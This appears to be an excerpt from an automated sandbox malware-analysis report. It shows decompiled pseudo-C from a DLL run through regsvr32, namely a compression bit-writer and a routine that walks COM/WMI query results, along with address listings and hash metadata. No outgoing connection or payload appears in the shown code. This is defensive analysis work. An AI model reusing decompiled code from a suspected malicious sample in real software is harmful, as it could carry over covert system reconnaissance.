											 *(_t223 + 0x16b8) = _t209 << _t259 | _t401;
											 *(_t223 + 0x16bc) = _t259 + 7;
										} else {
											_t193 = _t223 + 8; // 0x8d000040
											_t390 = _t388 + 0xfffffff5;
											_t194 = _t223 + 0x14; // 0xc703f045
											_t240 = _t390 << _t259 | _t401;
											 *(_t223 + 0x16b8) = _t240;
											 *( *_t193 +  *_t194) = _t240;
											 *((intOrPtr*)(_t223 + 0x14)) =  *((intOrPtr*)(_t223 + 0x14)) + 1;
											_t199 = _t223 + 0x14; // 0xc703f045
											_t200 = _t223 + 8; // 0x8d000040
											_t201 = _t223 + 0x16b9; // 0x89fffffe
											 *((char*)( *_t199 +  *_t200)) =  *_t201;
											 *((intOrPtr*)(_t223 + 0x14)) =  *((intOrPtr*)(_t223 + 0x14)) + 1;
											 *(_t223 + 0x16bc) =  *(_t223 + 0x16bc) + 0xfffffff7;
											 *(_t223 + 0x16b8) = _t390 >> 0x10;
										}
										goto L35;
									}
									_t123 = _t223 + 0xac0; // 0x4e9
									_t343 =  *_t123 & 0x0000ffff;
									_t124 = _t223 + 0xac2; // 0x33000000
									_t241 =  *_t124 & 0x0000ffff;
									_v24 = _t343;
									_t126 = _t223 + 0x16b8; // 0xfffffe8b
									_t346 = (_t343 << _t400 |  *_t126) & 0x0000ffff;
									_v28 = _t346;
									if(_t400 > 0x10 - _t241) {
										_t128 = _t223 + 0x14; // 0xc703f045
										 *(_t223 + 0x16b8) = _t346;
										_t130 = _t223 + 8; // 0x8d000040
										 *((char*)( *_t130 +  *_t128)) = _v28;
										_t223 = _a4;
										 *((intOrPtr*)(_t223 + 0x14)) =  *((intOrPtr*)(_t223 + 0x14)) + 1;
										_t136 = _t223 + 0x14; // 0xc703f045
										_t137 = _t223 + 8; // 0x8d000040
										_t138 = _t223 + 0x16b9; // 0x89fffffe
										 *((char*)( *_t136 +  *_t137)) =  *_t138;
										_t142 = _t223 + 0x16bc; // 0x8b3c7e89
										 *((intOrPtr*)(_t223 + 0x14)) =  *((intOrPtr*)(_t223 + 0x14)) + 1;
										_t346 = _v24 >> 0x10;
										_t400 =  *_t142 + 0xfffffff0;
									}
									_t403 = _t400 + _t241;
									_t347 = _t346 & 0x0000ffff;
									 *(_t223 + 0x16bc) = _t403;
									 *(_t223 + 0x16b8) = _t347;
									_t348 = _t347 & 0x0000ffff;
									if(_t403 <= 0xd) {
										_t163 = _t403 + 3; // 0x8b3c7e8c
										_t275 = _t163;
										L28:
										 *(_t223 + 0x16bc) = _t275;
										_t165 = _t388 - 3; // -2
										_t166 = _t223 + 0x16b8; // 0xfffffe8b
										 *(_t223 + 0x16b8) = (_t165 << _t403 |  *_t166 & 0x0000ffff) & 0x0000ffff;
									} else {
										_t392 = _t388 + 0xfffffffd;
										_t147 = _t223 + 0x14; // 0xc703f045
										_t244 = _t392 << _t403 | _t348;
										_t148 = _t223 + 8; // 0x8d000040
										 *(_t223 + 0x16b8) = _t244;
										 *( *_t148 +  *_t147) = _t244;
										 *((intOrPtr*)(_t223 + 0x14)) =  *((intOrPtr*)(_t223 + 0x14)) + 1;
										_t153 = _t223 + 0x14; // 0xc703f045
										_t154 = _t223 + 8; // 0x8d000040
										_t155 = _t223 + 0x16b9; // 0x89fffffe
										 *((char*)( *_t153 +  *_t154)) =  *_t155;
										 *((intOrPtr*)(_t223 + 0x14)) =  *((intOrPtr*)(_t223 + 0x14)) + 1;
										 *(_t223 + 0x16bc) =  *(_t223 + 0x16bc) + 0xfffffff3;
										 *(_t223 + 0x16b8) = _t392 >> 0x00000010 & 0x0000ffff;
									}
									goto L35;
								}
								_t289 = _a12;
								if(_t289 != _t398) {
									_t53 = _t289 * 4; // 0x238830a
									_t396 =  *(_t223 + _t53 + 0xa7e) & 0x0000ffff;
									_t56 = _t235 * 4; // 0x830a74c0
									_t370 =  *(_t223 + _t56 + 0xa7c) & 0x0000ffff;
									_t58 = _t223 + 0x16bc; // 0x8b3c7e89
									_t407 =  *_t58;
									_v28 = _t370;
									_t60 = _t223 + 0x16b8; // 0xfffffe8b
									_t249 = (_t370 << _t407 |  *_t60) & 0x0000ffff;
									if(_t407 <= 0x10 - _t396) {
										_t373 = _t249;
										_t308 = _t407 + _t396;
									} else {
										_t61 = _t223 + 0x14; // 0xc703f045
										_t62 = _t223 + 8; // 0x8d000040
										 *(_t223 + 0x16b8) = _t249;
										 *( *_t62 +  *_t61) = _t249;
										 *((intOrPtr*)(_t223 + 0x14)) =  *((intOrPtr*)(_t223 + 0x14)) + 1;
										_t67 = _t223 + 0x14; // 0xc703f045
										_t68 = _t223 + 8; // 0x8d000040
										_t69 = _t223 + 0x16b9; // 0x89fffffe
										 *((char*)( *_t67 +  *_t68)) =  *_t69;
										 *((intOrPtr*)(_t223 + 0x14)) =  *((intOrPtr*)(_t223 + 0x14)) + 1;
										_t75 = _t223 + 0x16bc; // 0x8b3c7e89
										_t373 = _v28 >> 0x00000010 & 0x0000ffff;
										_t308 =  *_t75 + 0xfffffff0 + _t396;
									}
									_t388 = _v24;
									 *(_t223 + 0x16bc) = _t308;
									 *(_t223 + 0x16b8) = _t373;
								}
								_t80 = _t223 + 0xabc; // 0x5d0674c0
								_t358 =  *_t80 & 0x0000ffff;
								_t81 = _t223 + 0x16bc; // 0x8b3c7e89
								_t402 =  *_t81;
								_t82 = _t223 + 0xabe; // 0x4e95d06
								_t245 =  *_t82 & 0x0000ffff;
								_v24 = _t358;
								_t84 = _t223 + 0x16b8; // 0xfffffe8b
								_t361 = (_t358 << _t402 |  *_t84) & 0x0000ffff;
								_v28 = _t361;
								if(_t402 > 0x10 - _t245) {
									_t86 = _t223 + 0x14; // 0xc703f045
									 *(_t223 + 0x16b8) = _t361;
									_t88 = _t223 + 8; // 0x8d000040
									 *((char*)( *_t88 +  *_t86)) = _v28;
									_t223 = _a4;
									 *((intOrPtr*)(_t223 + 0x14)) =  *((intOrPtr*)(_t223 + 0x14)) + 1;
									_t94 = _t223 + 0x14; // 0xc703f045
									_t95 = _t223 + 8; // 0x8d000040
									_t96 = _t223 + 0x16b9; // 0x89fffffe
									 *((char*)( *_t94 +  *_t95)) =  *_t96;
									_t100 = _t223 + 0x16bc; // 0x8b3c7e89
									 *((intOrPtr*)(_t223 + 0x14)) =  *((intOrPtr*)(_t223 + 0x14)) + 1;
									_t361 = _v24 >> 0x10;
									_t402 =  *_t100 + 0xfffffff0;
								}
								_t403 = _t402 + _t245;
								_t362 = _t361 & 0x0000ffff;
								 *(_t223 + 0x16bc) = _t403;
								 *(_t223 + 0x16b8) = _t362;
								_t363 = _t362 & 0x0000ffff;
								if(_t403 <= 0xe) {
									_t121 = _t403 + 2; // 0x8b3c7e8b
									_t275 = _t121;
									goto L28;
								} else {
									_t394 = _t388 + 0xfffffffd;
									_t105 = _t223 + 0x14; // 0xc703f045
									_t248 = _t394 << _t403 | _t363;
									_t106 = _t223 + 8; // 0x8d000040
									 *(_t223 + 0x16b8) = _t248;
									 *( *_t106 +  *_t105) = _t248;
									 *((intOrPtr*)(_t223 + 0x14)) =  *((intOrPtr*)(_t223 + 0x14)) + 1;
									_t111 = _t223 + 0x14; // 0xc703f045
									_t112 = _t223 + 8; // 0x8d000040
									_t113 = _t223 + 0x16b9; // 0x89fffffe
									 *((char*)( *_t111 +  *_t112)) =  *_t113;
									 *((intOrPtr*)(_t223 + 0x14)) =  *((intOrPtr*)(_t223 + 0x14)) + 1;
									 *(_t223 + 0x16bc) =  *(_t223 + 0x16bc) + 0xfffffff2;
									 *(_t223 + 0x16b8) = _t394 >> 0x00000010 & 0x0000ffff;
									goto L35;
								}
							} else {
								_t316 = _t223 + (_t235 + 0x29f) * 4;
								_v28 = _t316;
								do {
									_t378 = _a12;
									_t22 = _t223 + 0x16bc; // 0x8b3c7e89
									_t409 =  *_t22;
									_t24 = _t378 * 4; // 0x238830a
									_t250 =  *(_t223 + _t24 + 0xa7e) & 0x0000ffff;
									_t379 =  *_t316 & 0x0000ffff;
									_v24 = _t379;
									_t27 = _t223 + 0x16b8; // 0xfffffe8b
									_t382 = (_t379 << _t409 |  *_t27) & 0x0000ffff;
									_v20 = _t382;
									if(_t409 <= 0x10 - _t250) {
										_t321 = _t409 + _t250;
									} else {
										_t29 = _t223 + 0x14; // 0xc703f045
										 *(_t223 + 0x16b8) = _t382;
										_t31 = _t223 + 8; // 0x8d000040
										 *((char*)( *_t31 +  *_t29)) = _v20;
										_t223 = _a4;
										 *((intOrPtr*)(_t223 + 0x14)) =  *((intOrPtr*)(_t223 + 0x14)) + 1;
										_t37 = _t223 + 0x14; // 0xc703f045
										_t38 = _t223 + 8; // 0x8d000040
										_t39 = _t223 + 0x16b9; // 0x89fffffe
										 *((char*)( *_t37 +  *_t38)) =  *_t39;
										 *((intOrPtr*)(_t223 + 0x14)) =  *((intOrPtr*)(_t223 + 0x14)) + 1;
										_t382 = _v24 >> 0x10;
										_t45 = _t223 + 0x16bc; // 0x8b3c7e89
										_t321 =  *_t45 + 0xfffffff0 + _t250;
									}
									 *(_t223 + 0x16bc) = _t321;
									_t316 = _v28;
									 *(_t223 + 0x16b8) = _t382 & 0x0000ffff;
									_t388 = _t388 - 1;
								} while (_t388 != 0);
								L35:
								_t235 = _v8;
								_t388 = 0;
								_t398 = _a12;
								if(_t235 != 0) {
									if(_a8 != _t235) {
										_t329 = 7;
										_t217 = _t329 - 3; // 0x4
										_t254 = _t217;
									} else {
										_t329 = 6;
										_t216 = _t329 - 3; // 0x3
										_t254 = _t216;
									}
								} else {
									_t329 = 0x8a;
									_t214 = _t388 + 3; // 0x3
									_t254 = _t214;
								}
								goto L41;
							}
						}
						_t223 = _a4;
						if(_t235 == _v8) {
							_t235 = _v8;
							goto L41;
						}
						goto L4;
						L41:
						_v12 =  &(_v12[2]);
						_t221 =  &_v16;
						 *_t221 = _v16 - 1;
					} while ( *_t221 != 0);
					goto L42;
				}
			}
























































                            0x10016eb3
                            0x10016eba
                            0x10016ebe
                            0x10016ec0
                            0x10016ec2
                            0x10016ec8
                            0x100173b5
                            0x100173bb
                            0x10016ece
                            0x10016eda
                            0x10016ee7
                            0x10016eea
                            0x10016ef1
                            0x10016ef4
                            0x10016ef7
                            0x10016efa
                            0x10016efb
                            0x10016efe
                            0x10016f04
                            0x10016f07
                            0x10016f0c
                            0x10016f1c
                            0x10016f1e
                            0x10016fd4
                            0x10017163
                            0x10017163
                            0x1001716c
                            0x1001727f
                            0x1001727f
                            0x10017286
                            0x10017286
                            0x1001728f
                            0x1001729c
                            0x100172a5
                            0x100172a8
                            0x100172ad
                            0x100172f5
                            0x100172af
                            0x100172af
                            0x100172b2
                            0x100172b9
                            0x100172bf
                            0x100172c2
                            0x100172c5
                            0x100172c8
                            0x100172cb
                            0x100172ce
                            0x100172d4
                            0x100172e2
                            0x100172e5
                            0x100172e8
                            0x100172f1
                            0x100172f1
                            0x100172f8
                            0x100172fb
                            0x10017301
                            0x10017308
                            0x1001730e
                            0x1001735c
                            0x10017368
                            0x1001736f
                            0x10017310
                            0x10017310
                            0x10017313
                            0x1001731c
                            0x1001731f
                            0x10017322
                            0x10017329
                            0x1001732c
                            0x1001732f
                            0x10017332
                            0x10017335
                            0x1001733b
                            0x10017346
                            0x1001734c
                            0x10017353
                            0x10017353
                            0x00000000
                            0x1001730e
                            0x10017172
                            0x10017172
                            0x10017179
                            0x10017179
                            0x10017182
                            0x1001718f
                            0x10017198
                            0x1001719b
                            0x100171a0
                            0x100171a2
                            0x100171a5
                            0x100171ac
                            0x100171b2
                            0x100171b5
                            0x100171b8
                            0x100171bb
                            0x100171be
                            0x100171c1
                            0x100171c7
                            0x100171d5
                            0x100171db
                            0x100171de
                            0x100171e1
                            0x100171e1
                            0x100171e4
                            0x100171e6
                            0x100171e9
                            0x100171ef
                            0x100171f6
                            0x100171fc
                            0x10017255
                            0x10017255
                            0x10017258
                            0x10017258
                            0x1001725e
                            0x10017266
                            0x10017273
                            0x100171fe
                            0x100171fe
                            0x10017209
                            0x1001720c
                            0x1001720f
                            0x10017212
                            0x10017219
                            0x1001721c
                            0x1001721f
                            0x10017222
                            0x10017225
                            0x1001722b
                            0x10017237
                            0x1001723c
                            0x10017249
                            0x10017249
                            0x00000000
                            0x100171fc
                            0x10016fda
                            0x10016fdf
                            0x10016fe5
                            0x10016fe5
                            0x10016fed
                            0x10016fed
                            0x10016ff5
                            0x10016ff5
                            0x10016ffd
                            0x1001700a
                            0x10017013
                            0x10017018
                            0x1001705d
                            0x1001705f
                            0x1001701a
                            0x1001701a
                            0x1001701d
                            0x10017020
                            0x10017027
                            0x1001702a
                            0x1001702d
                            0x10017030
                            0x10017033
                            0x10017039
                            0x10017047
                            0x1001704d
                            0x10017056
                            0x10017059
                            0x10017059
                            0x10017062
                            0x10017065
                            0x1001706b
                            0x1001706b
                            0x10017072
                            0x10017072
                            0x10017079
                            0x10017079
                            0x10017081
                            0x10017081
                            0x10017088
                            0x10017095
                            0x1001709e
                            0x100170a1
                            0x100170a6
                            0x100170a8
                            0x100170ab
                            0x100170b2
                            0x100170b8
                            0x100170bb
                            0x100170be
                            0x100170c1
                            0x100170c4
                            0x100170c7
                            0x100170cd
                            0x100170db
                            0x100170e1
                            0x100170e4
                            0x100170e7
                            0x100170e7
                            0x100170ea
                            0x100170ec
                            0x100170ef
                            0x100170f5
                            0x100170fc
                            0x10017102
                            0x1001715b
                            0x1001715b
                            0x00000000
                            0x10017104
                            0x10017104
                            0x1001710f
                            0x10017112
                            0x10017115
                            0x10017118
                            0x1001711f
                            0x10017122
                            0x10017125
                            0x10017128
                            0x1001712b
                            0x10017131
                            0x1001713d
                            0x10017142
                            0x1001714f
                            0x00000000
                            0x1001714f
                            0x10016f24
                            0x10016f2a
                            0x10016f2d
                            0x10016f30
                            0x10016f30
                            0x10016f33
                            0x10016f33
                            0x10016f39
                            0x10016f39
                            0x10016f41
                            0x10016f46
                            0x10016f53
                            0x10016f5c
                            0x10016f5f
                            0x10016f64
                            0x10016fac
                            0x10016f66
                            0x10016f66
                            0x10016f69
                            0x10016f70
                            0x10016f76
                            0x10016f79
                            0x10016f7c
                            0x10016f7f
                            0x10016f82
                            0x10016f85
                            0x10016f8b
                            0x10016f99
                            0x10016f9c
                            0x10016f9f
                            0x10016fa8
                            0x10016fa8
                            0x10016fb2
                            0x10016fb8
                            0x10016fbb
                            0x10016fc2
                            0x10016fc2
                            0x10017375
                            0x10017375
                            0x10017378
                            0x1001737a
                            0x1001737f
                            0x1001738e
                            0x1001739a
                            0x1001739f
                            0x1001739f
                            0x10017390
                            0x10017390
                            0x10017395
                            0x10017395
                            0x10017395
                            0x10017381
                            0x10017381
                            0x10017386
                            0x10017386
                            0x10017386
                            0x00000000
                            0x1001737f
                            0x10016f1e
                            0x10016f13
                            0x10016f16
                            0x100173a4
                            0x00000000
                            0x100173a4
                            0x00000000
                            0x100173a7
                            0x100173a7
                            0x100173ab
                            0x100173ab
                            0x100173ab
                            0x00000000
                            0x10016ef4

                            Memory Dump Source
                            • Source File: 00000006.00000002.610943996.0000000010001000.00000040.00020000.sdmp, Offset: 10000000, based on PE: true
                            • Associated: 00000006.00000002.610930393.0000000010000000.00000002.00020000.sdmp Download File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_6_2_10000000_regsvr32.jbxd
                            Yara matches
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 0050a3338128a3e29d0738b8ec7b1954f4e7d535beab72997c1b6becb188d890
                            • Instruction ID: 0c3308942ac57208bd8606007510a2814f56dadb0132f9c471c079d8b51e24d2
                            • Opcode Fuzzy Hash: 0050a3338128a3e29d0738b8ec7b1954f4e7d535beab72997c1b6becb188d890
                            • Instruction Fuzzy Hash: EEF16D755092518FC709CF18C4D48FA7BF1FFA9310B1A82F9D8999B3A6D731A980CB91
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 10014FC0, Relevance: .2, Instructions: 190COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000006.00000002.610943996.0000000010001000.00000040.00020000.sdmp, Offset: 10000000, based on PE: true
                            • Associated: 00000006.00000002.610930393.0000000010000000.00000002.00020000.sdmp Download File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_6_2_10000000_regsvr32.jbxd
                            Yara matches
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: e5067ce0d69c97c32a38e7aeb3fef6c0114ffe29ce053d50af88417ef7cc46d5
                            • Instruction ID: e10ac18f6a2dc82c047ac3a6231bc634579b0427d93bb8cac9548a9b95137502
                            • Opcode Fuzzy Hash: e5067ce0d69c97c32a38e7aeb3fef6c0114ffe29ce053d50af88417ef7cc46d5
                            • Instruction Fuzzy Hash: 817135356201758FE704CF2ADCD05BA33A1E78E34138AC629FA46CF395C535E626CBA0
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 10011758, Relevance: .2, Instructions: 169COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000006.00000002.610943996.0000000010001000.00000040.00020000.sdmp, Offset: 10000000, based on PE: true
                            • Associated: 00000006.00000002.610930393.0000000010000000.00000002.00020000.sdmp Download File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_6_2_10000000_regsvr32.jbxd
                            Yara matches
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 3fd2de03972cb3b7321cea2e293ceee1f2e46d12c6b89ea3bcf7c4ef0d5e13cb
                            • Instruction ID: 8b2308eb0caa98c5fc40748196c6a291e313b8726404b2d010a505a218b38381
                            • Opcode Fuzzy Hash: 3fd2de03972cb3b7321cea2e293ceee1f2e46d12c6b89ea3bcf7c4ef0d5e13cb
                            • Instruction Fuzzy Hash: 175157B3B041B00BDF588E3D8C642757ED35AC515270EC2BAF9A9CB24AE978C7059760
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 10012346, Relevance: .1, Instructions: 72COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000006.00000002.610943996.0000000010001000.00000040.00020000.sdmp, Offset: 10000000, based on PE: true
                            • Associated: 00000006.00000002.610930393.0000000010000000.00000002.00020000.sdmp Download File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_6_2_10000000_regsvr32.jbxd
                            Yara matches
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 8030d81dc236fa19504743191c490e51e4050de0e9408ade4ea3357c27d2e4ca
                            • Instruction ID: 1f3934e2420efc180bb9c0cbc4fac13afaf5f650056083a87c6d8f741bd90931
                            • Opcode Fuzzy Hash: 8030d81dc236fa19504743191c490e51e4050de0e9408ade4ea3357c27d2e4ca
                            • Instruction Fuzzy Hash: 6E2192766150128BD35CDF2CD8A2A69F3A5FB48310F45427ED42BCB682CB71E492CB80
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 1000DB3C, Relevance: 24.9, APIs: 12, Strings: 2, Instructions: 388memoryCOMMON
                            Download Yara Rule
                            C-Code - Quality: 50%
                            			E1000DB3C(intOrPtr __ecx, intOrPtr __edx, void* __eflags, intOrPtr _a4) {
				signed int _v12;
				signed int _v16;
				signed int _v20;
				char _v24;
				void* _v28;
				signed int _v32;
				char _v36;
				intOrPtr _v40;
				signed int _v44;
				char _v48;
				char _v52;
				intOrPtr _v56;
				signed int _v60;
				char* _v72;
				signed short _v80;
				signed int _v84;
				char _v88;
				char _v92;
				char _v96;
				intOrPtr _v100;
				char _v104;
				char _v616;
				intOrPtr* _t159;
				char _t165;
				signed int _t166;
				signed int _t173;
				signed int _t178;
				signed int _t186;
				intOrPtr* _t187;
				signed int _t188;
				signed int _t192;
				intOrPtr* _t193;
				intOrPtr _t200;
				intOrPtr* _t205;
				signed int _t207;
				signed int _t209;
				intOrPtr* _t210;
				intOrPtr _t212;
				intOrPtr* _t213;
				signed int _t214;
				char _t217;
				signed int _t218;
				signed int _t219;
				signed int _t230;
				signed int _t235;
				signed int _t242;
				signed int _t243;
				signed int _t244;
				signed int _t245;
				intOrPtr* _t247;
				intOrPtr* _t251;
				signed int _t252;
				intOrPtr* _t253;
				void* _t255;
				intOrPtr* _t261;
				signed int _t262;
				signed int _t283;
				signed int _t289;
				char* _t298;
				void* _t320;
				signed int _t322;
				intOrPtr* _t323;
				intOrPtr _t324;
				signed int _t327;
				intOrPtr* _t328;
				intOrPtr* _t329;

				_v32 = _v32 & 0x00000000;
				_v60 = _v60 & 0x00000000;
				_v56 = __edx;
				_v100 = __ecx;
				_t159 = E1000D523(__ecx);
				_t251 = _t159;
				_v104 = _t251;
				if(_t251 == 0) {
					return _t159;
				}
				_t320 = E10008604(0x10);
				_v36 = _t320;
				_pop(_t255);
				if(_t320 == 0) {
					L53:
					E1000861A( &_v60, 0xfffffffe);
					E1000D5D7( &_v104);
					return _t320;
				}
				_t165 = E100095E1(_t255, 0x536);
				 *_t328 = 0x609;
				_v52 = _t165;
				_t166 = E100095E1(_t255);
				_push(0);
				_push(_v56);
				_v20 = _t166;
				_push(_t166);
				_push(_a4);
				_t322 = E100092E5(_t165);
				_v60 = _t322;
				E100085D5( &_v52);
				E100085D5( &_v20);
				_t329 = _t328 + 0x20;
				if(_t322 != 0) {
					_t323 = __imp__#2;
					_v40 =  *_t323(_t322);
					_t173 = E100095E1(_t255, 0x9e4);
					_v20 = _t173;
					_v52 =  *_t323(_t173);
					E100085D5( &_v20);
					_t324 = _v40;
					_t261 =  *_t251;
					_t252 = 0;
					_t178 =  *((intOrPtr*)( *_t261 + 0x50))(_t261, _v52, _t324, 0, 0,  &_v32);
					__eflags = _t178;
					if(_t178 != 0) {
						L52:
						__imp__#6(_t324);
						__imp__#6(_v52);
						goto L53;
					}
					_t262 = _v32;
					_v28 = 0;
					_v20 = 0;
					__eflags = _t262;
					if(_t262 == 0) {
						L49:
						 *((intOrPtr*)( *_t262 + 8))(_t262);
						__eflags = _t252;
						if(_t252 == 0) {
							E1000861A( &_v36, 0);
							_t320 = _v36;
						} else {
							 *(_t320 + 8) = _t252;
							 *_t320 = E100091E3(_v100);
							 *((intOrPtr*)(_t320 + 4)) = E100091E3(_v56);
						}
						goto L52;
					} else {
						goto L6;
					}
					while(1) {
						L6:
						_t186 =  *((intOrPtr*)( *_t262 + 0x10))(_t262, 0xea60, 1,  &_v28,  &_v84);
						__eflags = _t186;
						if(_t186 != 0) {
							break;
						}
						_v16 = 0;
						_v48 = 0;
						_v12 = 0;
						_v24 = 0;
						__eflags = _v84;
						if(_v84 == 0) {
							break;
						}
						_t187 = _v28;
						_t188 =  *((intOrPtr*)( *_t187 + 0x1c))(_t187, 0, 0x40, 0,  &_v24);
						__eflags = _t188;
						if(_t188 >= 0) {
							__imp__#20(_v24, 1,  &_v16);
							__imp__#19(_v24, 1,  &_v48);
							_t46 = _t320 + 0xc; // 0xc
							_t253 = _t46;
							_t327 = _t252 << 3;
							_t47 = _t327 + 8; // 0x8
							_t192 = E10008698(_t327, _t47);
							__eflags = _t192;
							if(_t192 == 0) {
								__imp__#16(_v24);
								_t193 = _v28;
								 *((intOrPtr*)( *_t193 + 8))(_t193);
								L46:
								_t252 = _v20;
								break;
							}
							 *(_t327 +  *_t253) = _v48 - _v16 + 1;
							 *((intOrPtr*)(_t327 +  *_t253 + 4)) = E10008604( *(_t327 +  *_t253) << 3);
							_t200 =  *_t253;
							__eflags =  *(_t327 + _t200 + 4);
							if( *(_t327 + _t200 + 4) == 0) {
								_t136 = _t320 + 0xc; // 0xc
								E1000861A(_t136, 0);
								E1000861A( &_v36, 0);
								__imp__#16(_v24);
								_t205 = _v28;
								 *((intOrPtr*)( *_t205 + 8))(_t205);
								_t320 = _v36;
								goto L46;
							}
							_t207 = _v16;
							while(1) {
								_v12 = _t207;
								__eflags = _t207 - _v48;
								if(_t207 > _v48) {
									break;
								}
								_v44 = _v44 & 0x00000000;
								_t209 =  &_v12;
								__imp__#25(_v24, _t209,  &_v44);
								__eflags = _t209;
								if(_t209 < 0) {
									break;
								}
								_t212 = E100091E3(_v44);
								 *((intOrPtr*)( *((intOrPtr*)(_t327 +  *_t253 + 4)) + (_v12 - _v16) * 8)) = _t212;
								_t213 = _v28;
								_t281 =  *_t213;
								_t214 =  *((intOrPtr*)( *_t213 + 0x10))(_t213, _v44, 0,  &_v80, 0, 0);
								__eflags = _t214;
								if(_t214 < 0) {
									L39:
									__imp__#6(_v44);
									_t207 = _v12 + 1;
									__eflags = _t207;
									continue;
								}
								_v92 = E100095E1(_t281, 0x250);
								 *_t329 = 0x4cc;
								_t217 = E100095E1(_t281);
								_t283 = _v80;
								_v96 = _t217;
								_t218 = _t283 & 0x0000ffff;
								__eflags = _t218 - 0xb;
								if(__eflags > 0) {
									_t219 = _t218 - 0x10;
									__eflags = _t219;
									if(_t219 == 0) {
										L35:
										 *((intOrPtr*)( *((intOrPtr*)(_t327 +  *_t253 + 4)) + 4 + (_v12 - _v16) * 8)) = E10008604(0x18);
										_t289 =  *((intOrPtr*)( *((intOrPtr*)(_t327 +  *_t253 + 4)) + 4 + (_v12 - _v16) * 8));
										__eflags = _t289;
										if(_t289 == 0) {
											L38:
											E100085D5( &_v92);
											E100085D5( &_v96);
											__imp__#9( &_v80);
											goto L39;
										}
										_push(_v72);
										_push(L"%d");
										L37:
										_push(0xc);
										_push(_t289);
										E10009640();
										_t329 = _t329 + 0x10;
										goto L38;
									}
									_t230 = _t219 - 1;
									__eflags = _t230;
									if(_t230 == 0) {
										L33:
										 *((intOrPtr*)( *((intOrPtr*)(_t327 +  *_t253 + 4)) + 4 + (_v12 - _v16) * 8)) = E10008604(0x18);
										_t289 =  *((intOrPtr*)( *((intOrPtr*)(_t327 +  *_t253 + 4)) + 4 + (_v12 - _v16) * 8));
										__eflags = _t289;
										if(_t289 == 0) {
											goto L38;
										}
										_push(_v72);
										_push(L"%u");
										goto L37;
									}
									_t235 = _t230 - 1;
									__eflags = _t235;
									if(_t235 == 0) {
										goto L33;
									}
									__eflags = _t235 == 1;
									if(_t235 == 1) {
										goto L33;
									}
									L28:
									__eflags = _t283 & 0x00002000;
									if((_t283 & 0x00002000) == 0) {
										_v88 = E100095E1(_t283, 0x219);
										E10009640( &_v616, 0x100, _t237, _v80 & 0x0000ffff);
										E100085D5( &_v88);
										_t329 = _t329 + 0x18;
										_t298 =  &_v616;
										L31:
										_t242 = E100091E3(_t298);
										L32:
										 *( *((intOrPtr*)(_t327 +  *_t253 + 4)) + 4 + (_v12 - _v16) * 8) = _t242;
										goto L38;
									}
									_t242 = E1000DA20( &_v80);
									goto L32;
								}
								if(__eflags == 0) {
									__eflags = _v72 - 0xffff;
									_t298 = L"TRUE";
									if(_v72 != 0xffff) {
										_t298 = L"FALSE";
									}
									goto L31;
								}
								_t243 = _t218 - 1;
								__eflags = _t243;
								if(_t243 == 0) {
									goto L38;
								}
								_t244 = _t243 - 1;
								__eflags = _t244;
								if(_t244 == 0) {
									goto L35;
								}
								_t245 = _t244 - 1;
								__eflags = _t245;
								if(_t245 == 0) {
									goto L35;
								}
								__eflags = _t245 != 5;
								if(_t245 != 5) {
									goto L28;
								}
								_t298 = _v72;
								goto L31;
							}
							__imp__#16(_v24);
							_t210 = _v28;
							 *((intOrPtr*)( *_t210 + 8))(_t210);
							_t252 = _v20;
							L42:
							_t262 = _v32;
							_t252 = _t252 + 1;
							_v20 = _t252;
							__eflags = _t262;
							if(_t262 != 0) {
								continue;
							}
							L48:
							_t324 = _v40;
							goto L49;
						}
						_t247 = _v28;
						 *((intOrPtr*)( *_t247 + 8))(_t247);
						goto L42;
					}
					_t262 = _v32;
					goto L48;
				} else {
					E1000861A( &_v36, _t322);
					_t320 = _v36;
					goto L53;
				}
			}





































































                            0x1000db45
                            0x1000db4b
                            0x1000db52
                            0x1000db55
                            0x1000db58
                            0x1000db5d
                            0x1000db5f
                            0x1000db64
                            0x1000dfac
                            0x1000dfac
                            0x1000db71
                            0x1000db73
                            0x1000db76
                            0x1000db79
                            0x1000df91
                            0x1000df97
                            0x1000dfa1
                            0x00000000
                            0x1000dfa6
                            0x1000db84
                            0x1000db8b
                            0x1000db92
                            0x1000db95
                            0x1000db9a
                            0x1000db9c
                            0x1000db9f
                            0x1000dba2
                            0x1000dba3
                            0x1000dbac
                            0x1000dbb2
                            0x1000dbb5
                            0x1000dbbe
                            0x1000dbc3
                            0x1000dbc8
                            0x1000dbdf
                            0x1000dbec
                            0x1000dbef
                            0x1000dbf6
                            0x1000dbfb
                            0x1000dc02
                            0x1000dc07
                            0x1000dc0e
                            0x1000dc10
                            0x1000dc1c
                            0x1000dc1f
                            0x1000dc21
                            0x1000df81
                            0x1000df82
                            0x1000df8b
                            0x00000000
                            0x1000df8b
                            0x1000dc27
                            0x1000dc2a
                            0x1000dc2d
                            0x1000dc30
                            0x1000dc32
                            0x1000df4d
                            0x1000df50
                            0x1000df53
                            0x1000df55
                            0x1000df77
                            0x1000df7c
                            0x1000df57
                            0x1000df5a
                            0x1000df65
                            0x1000df6c
                            0x1000df6c
                            0x00000000
                            0x00000000
                            0x00000000
                            0x00000000
                            0x1000dc38
                            0x1000dc38
                            0x1000dc4a
                            0x1000dc4d
                            0x1000dc4f
                            0x00000000
                            0x00000000
                            0x1000dc57
                            0x1000dc5a
                            0x1000dc5d
                            0x1000dc60
                            0x1000dc63
                            0x1000dc66
                            0x00000000
                            0x00000000
                            0x1000dc6c
                            0x1000dc7a
                            0x1000dc7d
                            0x1000dc7f
                            0x1000dc98
                            0x1000dca7
                            0x1000dcaf
                            0x1000dcaf
                            0x1000dcb2
                            0x1000dcb9
                            0x1000dcbd
                            0x1000dcc3
                            0x1000dcc5
                            0x1000df35
                            0x1000df3b
                            0x1000df41
                            0x1000df44
